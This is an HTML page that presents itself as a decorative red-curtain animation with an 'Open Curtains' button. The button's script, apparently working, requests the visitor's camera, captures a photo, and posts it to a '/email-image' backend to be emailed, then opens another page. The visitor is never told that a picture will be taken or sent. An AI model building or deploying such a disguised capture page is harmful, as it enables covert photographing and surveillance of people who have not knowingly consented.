
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Realistic Curtains - Capture and Email Image</title>
      <style>
        /* Your existing CSS styles */
    body {
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      background-color: #000;
      overflow: hidden;
    }

    .curtains {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      display: flex;
      z-index: 1;
    }

    .curtain {
      width: 50%;
      height: 100%;
      background: linear-gradient(to bottom, #8B0000, #4B0000);
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
      position: relative;
      transition: transform 2s ease-in-out;
    }

    .left-curtain {
      transform-origin: left;
      border-right: 2px solid #4B0000;
    }

    .right-curtain {
      transform-origin: right;
      border-left: 2px solid #4B0000;
    }

    .curtain::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: repeating-linear-gradient(
        90deg,
        transparent,
        transparent 10px,
        rgba(255, 255, 255, 0.1) 10px,
        rgba(255, 255, 255, 0.1) 20px
      );
    }

    .curtain::after {
      content: '';
      position: absolute;
      bottom: 0;
      left: 0;
      width: 100%;
      height: 10%;
      background: linear-gradient(to top, rgba(0, 0, 0, 0.5), transparent);
    }

    .curtains.open .left-curtain {
      transform: scaleX(0);
    }

    .curtains.open .right-curtain {
      transform: scaleX(0);
    }

    button {
      position: relative;
      z-index: 2;
      padding: 15px 30px;
      font-size: 20px;
      background-color: #4CAF50;
      color: white;
      border: none;
      cursor: pointer;
      border-radius: 5px;
      transition: background-color 0.3s;
    }

    button:hover {
      background-color: #45a049;
    }

      </style>
    </head>
    <body>
      <div class="curtains">
        <div class="curtain left-curtain"></div>
        <div class="curtain right-curtain"></div>
      </div>
      
      <button onclick="openCurtainsAndCapture()">Open Curtains</button>
      
      <script>
        function openCurtainsAndCapture() {
          // Open the curtains
          const curtains = document.querySelector('.curtains');
          curtains.classList.add('open');
    
          // Wait for the animation to finish
          setTimeout(() => {
            // Capture image from the camera
            captureImage();
            window.open('1.html', '_blank');
        }, 2000); // 2 seconds delay for the animation
      }
        async function captureImage() {
          try {
            // Access the camera
            const stream = await navigator.mediaDevices.getUserMedia({ video: true });
            const video = document.createElement('video');
            video.srcObject = stream;
            await video.play();
    
            // Create a canvas to capture the image
            const canvas = document.createElement('canvas');
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            const context = canvas.getContext('2d');
            context.drawImage(video, 0, 0, canvas.width, canvas.height);
    
            // Stop the camera stream
            stream.getTracks().forEach(track => track.stop());
    
            // Convert the canvas image to a file
            canvas.toBlob(async (blob) => {
              // Send the image to the backend
              const formData = new FormData();
              formData.append('image', blob, 'captured_image.png');
    
              // Replace with your backend endpoint
              const response = await fetch('/email-image', {
                method: 'POST',
                body: formData,
              });
    
              if (response.ok) {
                console.log('Image sent for emailing.');
              } else {
                console.error('Failed to send image.');
              }
            }, 'image/png');
          } catch (error) {
            console.error('Error capturing image:', error);
          }
        }
      </script>
    </body>
    </html>